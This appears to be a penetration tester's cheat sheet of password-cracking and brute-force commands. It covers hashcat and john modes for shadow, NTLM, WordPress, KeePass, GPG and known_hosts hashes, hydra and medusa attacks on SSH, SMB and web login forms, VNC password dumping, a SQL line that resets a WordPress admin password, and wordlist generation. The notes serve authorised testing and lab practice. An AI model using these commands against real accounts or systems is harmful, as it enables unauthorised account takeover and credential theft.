bkcrack: cracking password when some files are known

• https://book.hacktricks.xyz/generic-methodologies-and-resources/brute-force#known-plaintext-zip-attack

Browser password cracking

• https://github.com/moonD4rk/HackBrowserData

crackmeexec

• mass brute forcing

> crackmapexec ldap -u users.txt -p pass.txt -M laps <target-ip>

gpg cracking

• convert private key to john format

> gpg2john creds.priv

• crack the private key

> john --wordlist=/usr/share/wordlists/rockyou.txt gpg.john

• import to keyring

> echo "qwertyuiop" | gpg --batch --yes --allow-secret-key-import --import creds.priv

• decrypt gpg text

> echo "qwertyuiop" | gpg --batch --yes --decrypt --passphrase-fd 0 creds.txt.gpg

hashcat

• https://hashcat.net/wiki/doku.php?id=example_hashes

hashcat64.exe -a 0 -m 18200 hash.txt passwordlist.txt

• Common use cases

# sha2-256
> hashcat.exe -m 1400 hash.txt rockyou.txt

# shadow
> hashcat.exe -m 1800 -a 0 -o result.txt --remove hash.txt rockyou.txt

# ntlm
> hashcat.exe --force -m 1000 -r rules\best64.rule hash.txt rockyou.txt --outfile alice.recovered

# wordpress
> hashcat.exe -m 400 -a 0 hash.txt rockyou.txt
> pass123:`$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0`
> UPDATE `wp_users` SET `user_pass`='$P$BNMdSXZIJVPFih/nCL/Tm6eT152wQv0' WHERE user_login='admin';

# kdb
> keepass2john Database.kdb
> hashcat.exe -a 0 -m 13400 hash.txt rockyou.txt

# apache password
> hashcat.exe -a 0 -m 1600 hash.txt rockyou.txt

# rar5
> hashcat64.exe -a 3 -m 13000 hash.txt rockyou.txt

hydra

• multi-thread

> hydra -t 4 -l hadi -P passwords-mutated.txt <ip> ssh

• multiple users, passwords, servers

> hydra -L users.txt -P passwords.txt -M servers.txt smb

• post form brute force

* F=failed is for flag search for failure
* S=<code> is for status code

> hydra -l root@localhost -P wordlist.txt <ip> http-post-form "/<path-to-login-form>:<req-params>&User=^USER^&Password=^PASS^:F=failed"

# Wordpress examples
> hydra -l admin -P /usr/share/wordlists/rockyou.txt <ip> http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect"
> proxychains -q hydra -l admin -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt <ip> -s 9999 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In&testcookie=1:F=incorrect"

known_hosts cracking

• https://github.com/chris408/known_hosts-hashcat

# known_hosts in the following format
|1|hl0YV0IGtl8GWLFNcFuR94BrJxc=|/AFIoup5IaWwtDG9RMEvirDFo9c= ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBJEd7x32eXrsJKVS9556PvIIKUYXHKwbyMLGpwNKA6vnIXEgYAW9WRtVh2tRgFB33BCNWj/XoMHmeG7iOTu8Gqs=

# convert to hashcat compatible format
> python3 kh-converter.py known_hosts
fc0148a2ea7921a5b0b431bd44c12f8ab0c5a3d7:865d18574206b65f0658b14d705b91f7806b2717

# crack
> hashcat -m 160 --quiet --hex-salt hash.txt -a 3 ipv4_hcmask.txt
fe21773879e65286ef306151251608165c3e22b3:ed9c2eb01d82af664b63caf7c39062ed28d6a1a1:<ip>

medusa

> medusa -h portal.windcorp.htb -u admin -p admin -M web-form -m FORM:"/login" -m DENY-SIGNAL:"Wrong credentials" -m FORM-DATA:"username=&password="

pdf cracking

pdfcrack -f file.pdf -w /usr/share/wordlists/rockyou.txt

virtualbox

• https://github.com/axcheron/pyvboxdie-cracker
• https://github.com/hashcat/hashcat/blob/master/tools/virtualbox2hashcat.py

vnc cracking

• Dump password

> reg export "HKLM\Software\TightVNC\Server" foo.reg

• Crack using: https://github.com/trinitronx/vncpasswd.py

> python vncpasswd.py -d -H 2151d3722874ad0c

wpscan brute-forcing

> wpscan --url http://<ip> -U {user} -P /usr/share/wordlists/SecLists/Passwords/Common-Credentials/10k-most-common.txt

zip files

fcrackzip -D -u -p ‘/usr/share/wordlists/rockyou.txt’ bank-account.zip

Wordlist generation

• unshadow the passwd

> unshadow passwd shadow

• cupp: password profiling

> cupp -w mutated.txt

• crunch: generate passwords with prefix

> crunch 24 24 -t ThisIsTheUsersPassword%% -o passwords.txt

• cewl: generate a seed wordlist website (good to use with hydra)

> cewl -w secretsec.txt http://<ip>

• usernamer: generate usernames, use together with smtp-user-enum.pl and cewl

https://github.com/jseidl/usernamer

• rsmangler: generate a mangled wordlist from a base list

> rsmangler --file base_wordlist.txt --output mangled.txt

• hashcat: generate wordlist using custom char set

> hashcat.exe --force --stdout -a 3 -1 ABCD -2 abcd -3 0123 -4 !@# ?1?12?23?123?1234 > wordlist.txt

Common password lists

/usr/share/wordlists/SecLists/Passwords/Common-Credentials/best1050.txt dirb/wordlists/common.txt dict/wordlist-probable.txt wfuzz/wordlist/general/megabeast.txt sqlmap/data/txt/smalldict.txt seclists/Miscellaneous/lang-english.txt seclists/Miscellaneous/wordlist-skipfish.fuzz.txt seclists/Discovery/DNS/dns-Jhaddix.txt seclists/Discovery/Web-Content/common-and-french.txt seclists/Discovery/Web-Content/big.txt seclists/Discovery/Web-Content/raft-large-words.txt seclists/Discovery/Web-Content/common.txt seclists/Discovery/Web-Content/common-and-italian.txt seclists/Discovery/Web-Content/common-and-spanish.txt seclists/Discovery/Web-Content/common-and-portuguese.txt seclists/Discovery/Web-Content/raft-large-words-lowercase.txt seclists/Passwords/mssql-passwords-nansh0u-guardicore.txt seclists/Passwords/bt4-password.txt seclists/Passwords/Leaked-Databases/phpbb-cleaned-up.txt seclists/Passwords/Leaked-Databases/phpbb.txt seclists/Passwords/Software/cain-and-abel.txt seclists/Passwords/dutch_common_wordlist.txt seclists/Passwords/openwall.net-all.txt seclists/Passwords/Honeypot-Captures/multiplesources-passwords-fabian-fingerle.de.txt seclists/Passwords/darkc0de.txt seclists/Usernames/xato-net-10-million-usernames.txt seclists/Usernames/xato-net-10-million-usernames-dup.txt wordlists/dirb/common.txt wordlists/wfuzz/general/megabeast.txt wordlists/rockyou.txt